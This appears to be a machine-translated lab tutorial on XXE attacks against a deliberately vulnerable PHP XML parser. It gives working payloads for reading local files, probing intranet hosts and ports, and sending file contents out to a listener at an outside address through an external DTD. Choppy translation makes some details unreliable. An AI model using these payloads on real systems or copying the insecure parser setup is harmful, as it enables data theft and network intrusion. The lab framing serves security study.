Environment: phpstudy+xml.php has
no echo, the virtual machine kali
Xml.php code is as follows:
<?php
libxml_disable_entity_loader (false); //这里相当于开启外部实体
//若为true,则表示禁用外部实体
$xmlfile = file_get_contents('php://input');
//可以获取POST来的数据
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
//LIBXML_NOENT:将XML中的实体引用替换成对应的值
//LIBXML_DTDLOAD:加载DOCTYPE中的DTD文件
$creds = simplexml_import_dom($dom);
//获取DOM文档节点并转换为SimpleXML节点
echo $creds;
?>
One. There is an echo
1. Read local files (without special characters such as &,<,>,",')
<1>Access xml.php
<2>Enter the xxe
code as follows:
<?xml version=”1.0” encoding=”utf-8”?>
<!DOCTYPE creds [
<!ENTITY f SYSTEM “file:///c:/windows/system.ini”> ]>
<creds>&f;</creds>
The following results are obtained: It is
found that the local file is successfully read.
Try another path, and it is found to be successful.
2. Reading a local file (containing special characters)
. Accessing a file with special characters in the file content through the first method will cause an error,
because Therefore, you need to use CDATA, all characters in CDATA will be regarded as the constant part of the element character data, instead of xml tag
<1> access xml.php
<2> write the external entity evil.dtd
related code:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">
<3>Enter the xxe
code as follows:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///E:/phpStudy/PHPTutorial/WWW/XXE/1.txt">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:81/XXE/evil.dtd">
%dtd; ]>
<roottag>&all;</roottag>
The following results are obtained: It is
found that files with special characters have been successfully read
3. Intranet ip detection
<1>Access xml.php
<2>Enter the xxe
code as follows:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.78.4"> ]>
<creds>&goodies;</creds>
The following results are obtained: The
red circle indicates that the ip has
garbled characters and does not appear. The red circle above indicates that the ip does not exist (burp can be used to replay it more convenient).
You can also judge whether the ip exists according to the length of response
. 4. Intranet port detection is the
same as 3. Enter the xxe
code as follows:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [
<!ENTITY goodies SYSTEM "php://filter/convert.base64-encode/resource=http://10.0.78.4:80"> ]>
<creds>&goodies;</creds>
You can still judge whether the port is open according to the two judgment methods in 3. If there is an error, you can directly detect the banner information
. II. The
code of xml.php2 without echo is as follows:
<?php
libxml_disable_entity_loader (false);
//若为true,则表示禁用外部实体
$xmlfile = file_get_contents('php://input');
//可以获取POST来的数据
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
?>
xml.php2 has no echo,
so we need to use the external data channel to extract data, which can be displayed through the listening port.
<1>Access xml2.php
<2>Write the external entity evil2.dtd
code as follows:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///c:/windows/system.ini">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://10.0.78.29:9999?p=%file;'>">
<3>Enter the xxe
code as follows:
<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://10.0.78.4:81/XXE/evil2.dtd">
%remote;%int;%send;
]>
The results are as follows:
successfully read the file